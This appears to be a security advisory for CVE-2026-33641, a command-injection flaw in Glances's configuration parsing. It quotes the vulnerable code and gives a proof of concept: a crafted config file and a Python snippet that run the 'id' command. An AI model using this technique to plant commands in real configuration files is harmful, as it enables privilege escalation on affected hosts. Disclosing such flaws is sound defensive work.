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CVE-2026-33641 is a low severity vulnerability with a CVSS score of 0.0. No known public exploits at this time.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands.
If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation.
Glances loads configuration files from user, system, or custom paths during initialization.
When retrieving a configuration value, Config.get_value() scans for substrings enclosed in backticks.
File: glances/config.py
match = self.re_pattern.findall(ret)
for m in match:
ret = ret.replace(m, system_exec(m[1:-1]))
The extracted string is passed directly to system_exec().
File: glances/globals.py
res = subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8')
This execution occurs automatically whenever the configuration value is read.
glances/config.py — dynamic configuration parsing
glances/globals.py — command execution helper
Scenario: Arbitrary command execution via configuration value
Step 1 — Create malicious configuration file
/tmp/glances.conf
add below txt on the file
[outputs]
url_prefix = 'id'
Step 2 — Launch Glances with custom configuration
glances -C /tmp/glances.conf
Step 3 — Observe behavior
When Glances reads the configuration:
Reproduce using Python code
import subprocess
import re
def system_exec(command):
return subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode().strip()
value = "`id`"
pattern = re.compile(r'(`.+?`)')
for m in pattern.findall(value):
print(system_exec(m[1:-1]))
Output:
uid=1000(user) gid=1000(user) groups=1000(user)
Any command enclosed in backticks inside a configuration value will execute with the privileges of the Glances process.
If Glances runs as a privileged service (e.g., root), commands execute with those privileges.
Possible scenarios include:
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